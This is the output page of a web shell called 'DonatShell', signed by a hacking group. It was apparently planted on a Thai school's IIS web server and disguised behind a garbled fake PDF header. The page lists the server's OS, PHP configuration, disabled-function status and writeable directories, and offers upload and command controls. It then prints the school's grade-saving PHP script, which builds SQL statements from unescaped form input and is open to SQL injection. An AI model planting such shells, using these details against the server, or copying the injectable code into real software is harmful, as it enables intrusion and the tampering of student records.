%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/mis/teacher/subject_score_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/mis/teacher/subject_score_v2/SaveScore.php
<?PHP
session_start();
// print_r($_SESSION);
// exit(); IDTeacher
include("conf.php");
$YMDRecode =  "1|".$_SESSION["IDTeacher"]."@".date("Ymd#Hms");
$LogFileName = $_SESSION['AYear'].'-'.$_SESSION["Term"].'-'.$_SESSION["IDTeacher"].'-'.iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) .'-'.iconv('utf-8', 'tis-620', $_SESSION["PClass"]) .'-'.$_SESSION["PRoom"].' (Score).txt';
for ($i = 1; $i <= count($_POST['IDStudent']); $i++) {
	//echo $i  . " => " . $_POST['IDStudent'][$i] . " , " . $_POST['ScoreMark'][$i] . ", " . $_POST['Score'][$i] . "<BR>";
	
	if ($_SESSION["PClass"] != "") {
		$sql = "update TScore set " . rtrim($_SESSION["ScoreField"]) . " = " . $_POST['Score'][$i] . ",YMDRecord='".$YMDRecode."' where   Regyear='" . $_SESSION["AYear"] . "' and (RegTerm='" . $_SESSION["Term"] . "' or RegTerm='_') and PSubjectCode='" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "' and PClass='" . iconv('utf-8', 'tis-620', $_SESSION["PClass"]) . "' and PRoom='" . $_SESSION["PRoom"] . "' and  IDTeacher='" . $_SESSION["IDTeacher"] . "' and IDStudent='" . $_POST['IDStudent'][$i] . "' and isnull(PGrade,'')=''";
	} else {
		// ไม่น่าจะมี ห้องมา เพราะอันนั้นเป็นรายวิชากิจกรรมของสาธิตซึ่งมีหลายห้องไม่เกี่ยวกับ KOWIT
		//$sql = "update TScore set " . rtrim($_SESSION["ScoreField"]) . " = " . $_POST['Score'][$i] . ",YMDRecord='".$YMDRecode."' where   Regyear='" . $_SESSION["AYear"] . "' and (RegTerm='" . $_SESSION["Term"] . "' or RegTerm='_') and PSubjectCode='" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "'  and IDStudent='" . $_POST['IDStudent'][$i] . "'";
		exit();
	}
	file_put_contents('./log/'.$LogFileName, date('Y-m-d H:i:s').': '.$sql. PHP_EOL, FILE_APPEND);
	//echo $sql . "<BR>";
	$stmt = sqlsrv_query($conn, $sql);
	//echo $sql."<BR>";
	if ($stmt === false) {
		echo "<h3 class='text-danger'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</h2>";
		exit();
		break;
	}
}
$file = 'people.txt';
// Open the file to get existing content
$current = file_get_contents($file); 
$current .= $sql."\n"; 
file_put_contents($file, $current);

$sql="update TScore set 
P100 = isnull(PFor1,0)+isnull(PSum,0)+isnull(PFor2,0)+isnull(PFin,0)  , 
P1100 = isnull(PFor1,0)+isnull(PSum,0)+isnull(PFor2,0)+isnull(PFin,0)  ,
P2100 = isnull(P2For1,0)+isnull(P2Sum,0)+isnull(P2For2,0)+isnull(P2Fin,0)  ,
P200 =  isnull(PFor1,0)+isnull(PSum,0)+isnull(PFor2,0)+isnull(PFin,0)+ isnull(P2For1,0)+isnull(P2Sum,0)+isnull(P2For2,0)+isnull(P2Fin,0)  where   Regyear='" . $_SESSION["AYear"] . "' and (RegTerm='" . $_SESSION["Term"] . "' or RegTerm='_') and PSubjectCode='" . iconv('utf-8', 'tis-620', $_SESSION["PSubjectCode"]) . "' and PClass='" . iconv('utf-8', 'tis-620', $_SESSION["PClass"]) . "' and PRoom='" . $_SESSION["PRoom"] . "' and  IDTeacher='" . $_SESSION["IDTeacher"] . "'  and isnull(PGrade,'')=''";

file_put_contents('./log/'.$LogFileName, date('Y-m-d H:i:s').': '.$sql. PHP_EOL, FILE_APPEND);
$stmt = sqlsrv_query($conn, $sql);
	//echo $sql."<BR>";
	if ($stmt === false) {
		echo "<h3 class='text-danger'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้ (คะแนนรวม)</h2>";
		exit();
		break;
	} else {
		echo "<h3 class='text-success'>บันทึกคะแนนเสร็จสมบูรณ์...</h2>";
		$current = file_get_contents($file); 
		$current .= $sql."\n"; 
		file_put_contents($file, $current);
	}
exit();

Anon7 - 2022
AnonSec Team